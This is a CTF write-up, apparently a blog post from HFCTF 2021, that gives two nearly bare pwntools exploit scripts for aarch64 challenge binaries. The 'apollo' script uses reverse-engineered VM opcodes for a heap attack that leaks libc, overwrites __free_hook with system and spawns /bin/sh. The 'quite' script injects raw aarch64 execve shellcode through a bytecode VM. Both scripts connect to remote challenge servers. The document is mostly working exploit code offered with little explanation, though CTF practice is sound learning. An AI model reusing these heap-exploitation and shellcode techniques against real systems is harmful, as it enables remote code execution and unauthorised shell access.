HFCTF_2021

只做了两个常规pwn,区块链什么的我真不会

apollo

1
#coding=utf-8
2
from pwn import*
3
#context.log_level = 'DEBUG'
4
'''
5
func_table:	  [0x14018 + proc_base]
6
opcode_table: [0x13FE8 + proc_base]
7
0x0: 0x4D->
8
		   calloc(location,1);
9
		   calloc(timeS,1);
10
           opcode +=3;
11
			
12
0x1: 0x2A->add;just one times;
13
           p8(index0) + p8(index1)+p16(Size); opcode+=5
14
0x2: 0x2F->
15
           free();
16
           p8(index0) + p8(index1); opcode+=3
17
0x3: 0x2B->
18
           Set the Location;
19
           p8(index0) + p8(index1) + p8(Location); opcode+=4
20
           1 < Size <= 4;
21
0x4: 0x2D->
22
           Set the Location into 0;
23
           p8(index0) + p8(index1); opcode +=3
24
0 0 0 0 0 0 0 0 0 0
25
0 0 0 0 0 0 0 0 0 0
26
0 0 0 0 0 0 0 0 0 0
27
0 0 0 0 0 0 0 0 0 0
28
0 0 0 0 0 0 0 0 0 0
29
0 0 0 0 0 0 0 0 0 0
30
0 0 0 0 0 0 0 0 0 0
31
0 0 0 0 0 0 0 0 0 0
32
0 0 0 0 0 0 0 0 0 0
33
0 0 0 0 0 0 0 0 0 0
34
35
0x5: 0x77->
36
           opcode++; Up   ->2、3->2; or 0->1;
37
0x6: 0x73->
38
           opcode++; Down ->2、3->2; or 0->1;
39
0x7: 0x61->
40
           opcode++; Left ->2、3->2; or 0->1;
41
0x8: 0x64->
42
           opcode++; Right->2、3->2; or 0->1;
43
0x9: 0x70->
44
           show;opcode++;
45
0xA: 0x00->Exit
46
0xB: 0x01->default;opcode++;
47
48
'''
49
#p = process(['qemu-aarch64','-g','5555','-L','.','./main'])
50
libc = ELF('./libc-2.27.so')
51
p = remote('8.140.179.11',13422)
52
payload  = '\x4D\x10\x10' #init_All_Var
53
payload += '\x2A\x00\x04\xF0\x04' # Add 0
54
payload += '\x2A\x00\x05\x10\x00' # Add 1
55
payload += '\x2F\x00\x04' #delete 0
56
payload += '\x2A\x00\x04\xF0\x00' # Add 0
57
payload += '\x70'
58
payload += '\x73'*0xE
59
payload += '\x64\x61'*0x36
60
payload += '\x64'*6
61
payload += '\x2B\x0E\x07\x03'
62
payload += '\x64'
63
payload += '\x2B\x0F\x08\x03'
64
payload += '\x73'
65
payload += '\x2A\x00\x06\x70\x00' # Add 2
66
payload += '\x2A\x00\x07\x70\x03' # Add 3
67
payload += '\x2F\x00\x06' # delete 2
68
payload += '\x2F\x00\x04' # delete 0
69
payload += '\x2A\x00\x04\x70\x01' # Add 0
70
payload += '\x2A\x00\x06\x70\x00' # Add 2
71
payload += '\x2A\x00\x08\x70\x00' # Add free_hook
72
payload += '\x2F\x00\x06' # delete 2
73
payload += '\x00'
74
p.sendlineafter('cmd> ',payload)
75
sleep(0.1)
76
p.sendline('FMYY')
77
sleep(0.1)
78
p.sendline('FMYY')
79
sleep(0.1)
80
p.send('\x10') 
81
p.recvuntil('pos:0,4\n')
82
libc_base = (u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) | 0x4000000000) - 0xF10 - 0x154000
83
log.info('LIBC:\t' + hex(libc_base))
84
log.info('__malloc_Hook:\t' + hex(libc_base + libc.sym['__malloc_hook']))
85
system = libc_base + libc.sym['system']
86
free_hook = libc_base + libc.sym['__free_hook']
87
log.info('__free_hook:\t' + hex(free_hook))
88
p.sendline('FMYY')
89
sleep(0.1)
90
p.sendline('FMYY')
91
sleep(0.1)
92
p.sendline('\x00'*0x100 + p64(free_hook))
93
sleep(0.1)
94
p.sendline('/bin/sh\x00')
95
sleep(0.1)
96
p.sendline(p64(system))
97
sleep(0.1)
98
99
p.interactive()

quite

1
#coding=utf-8
2
from pwn import*
3
'''
4
X22: 0x100000000000
5
X21: OPCode_Memory
6
N:0 Index:0x28;  X22 --;opcode+=1
7
N:1	Index:0x29;  X22 ++;opcode+=1
8
N:2	Index:0x2A; [X22]++;opcode+=1;
9
N:3	Index:0x2F; [X22]--;opcode+=1;
10
N:4	Index:0x40; _IO_putc(X22);opcode+=1;
11
N:5	Index:0x23; _IO_getc(X22);opcode+=1;
12
N:6	Index:0x5B; 
13
N:7	Index:0x5D;
14
N:8	Index:0x00;
15
N:9	Index:0x47; Call 0x100000000000
16
N:A Index:0x01; Default;
17
'''
18
#p = process(['qemu-aarch64','-g','6666','-L','.','./main'])
19
p = remote('8.140.179.11',51322)
20
shellcode = '\xE1\x45\x8C\xD2\x21\xCD\xAD\xF2\xE1\x65\xCE\xF2\x01\x0D\xE0\xF2\xE1\x8F\x1F\xF8\xE1\x03\x1F\xAA\xE2\x03\x1F\xAA\xE0\x63\x21\x8B\xA8\x1B\x80\xD2\xE1\x66\x02\xD4'
21
22
p.send('\x23\x29'*len(shellcode) + '\x47')
23
24
sleep(0.5)
25
p.send(shellcode)
26
p.interactive()
Contents
  1. 1. apollo
  2. 2. quite
|